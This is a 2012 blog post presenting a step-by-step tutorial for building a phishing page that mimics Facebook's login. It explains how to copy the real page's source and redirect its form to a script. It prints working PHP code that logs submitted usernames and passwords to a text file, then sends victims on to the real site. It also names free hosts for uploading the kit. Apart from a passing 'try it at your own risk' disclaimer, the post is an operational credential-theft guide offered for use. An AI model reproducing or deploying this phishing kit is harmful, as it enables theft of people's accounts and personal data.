Sunday, June 3, 2012

How to Hack Facebook Account Using Phising webPage...Full Tutorial

So Friends,Try it with Your Own Risk , Even me myself didnt ever make a phishing page bcz phishing is a crime according to the Cyber Law.



Letz start,

Now im gonna make a step by step tutorial for facebook accounts.

1.> go to "www.facebook.com/login.php" and right click on some white space on the page and press "view source code". ALOT of text is gonna appear, copy it all to notepad.

2.>
Now we need to change a few things in the code. So that the login button sends the info to our file instead of the facebook login. We do that by editing the action of the code. So press Edit >> search. and search "action=" without the quotes. you should find this
http://img354.imageshack.us/img354/7116/screen1pf8.png
The big red ring that circles the "action=" you have to change. You have to change it to 'action="next.php" '. after you have done that, you should change the method (small red circle on the picture) to "get" instead of "post", or else it will not work. Save the document as "index.PHP" (not htm!)

3.>
Now that we changed the action to next.php, we should also make a "next.php". open up notepad again. And write this::header("Location: http://www.facebook.com/login.php ");
$handle = fopen("passwords.txt", "a");
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>Save this as "next.php"

Note: for security you should rename "passwords.txt" to something else.
now make a text file called "passwords.txt" or whatever you renamed the file to in the "next.php", leave this document blank.

4.>Upload the 3 files "index.php", "next.php" and "passwords.txt" (or whatever the password file is called) to a subdomain hosting site. THEY MUST SUPPORT .PHP! i suggest these: 110mb.com, t35.com or 007sites.com. When you made an account you should upload the 3 files.
YOU HAVE DONE..
PLZZZ COMMENTS IF WORK.

No comments:

Post a Comment